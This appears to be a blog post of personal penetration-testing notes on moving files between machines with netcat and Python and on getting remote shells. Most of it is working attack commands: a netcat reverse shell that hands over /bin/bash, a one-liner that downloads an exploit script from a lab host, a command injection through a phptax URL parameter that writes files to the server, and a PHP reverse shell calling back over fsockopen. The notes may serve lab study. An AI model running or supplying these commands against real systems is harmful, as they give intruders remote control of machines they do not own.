file-transfers


Sending a File from one machine to another with NETCAT seems back to to front.
Seems odd that the sender machine would be listening. whereby listening would imply waiting and not sending..

In Linux
Linux
##Sender Machine nc -v -w 40 -p 443 -l < file.php
Linux
###Receiver Machine nc -v -w 10 192.168.0.100 443 > file.php

Sending from Linux to Windows

We first setup a Listener and tell netcat that any incoming file should be directed to a file name of our choice, regardless to what the file is.

Linux
##Sender Machine nc -nv 10.0.0.22 4444 < /usr/bin/wget.exe

Windows
##Receiver Machine nc -nlvp 40 > incomingfile.exe


Sending a Reverse Shell - This is when the sebding machine gives control of their system to the receiver.

###SenderMachine
nc -nv 10.0.0.22 443 -e /bin/bash

###Receiver Machine
nc -nlvp 443


Using Python  like Wget - test it first
python.exe -c "import sys; print(sys.version_info)"

Sender
C:\python26\python.exe -c "import urllib2; u = urllib2.urlopen('http://10.11.0.108:4445/35936.py'); localFile = open('local_file', 'w') ; localFile.write(u.read()); localFile.close()"

Receiver
python -m SimpleHTTPServer 4445



Side Note:
If you cant create reverse or bind shells the try to create a file.
Using this logic we ca try to make a file with the php information of the system (phpinfo)
Something similar to this:

http://192.168.198.138:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php phpinfo() ?>" > a.php;&pdf=make

If we can make files then we can try a simple php shell - remember to escape the "$"

echo "\$sock=fsockopen('192.168.0.100',4444);exec('/bin/sh -i <&3 >&3 2>&3');" > shell4.php

No comments:

Post a Comment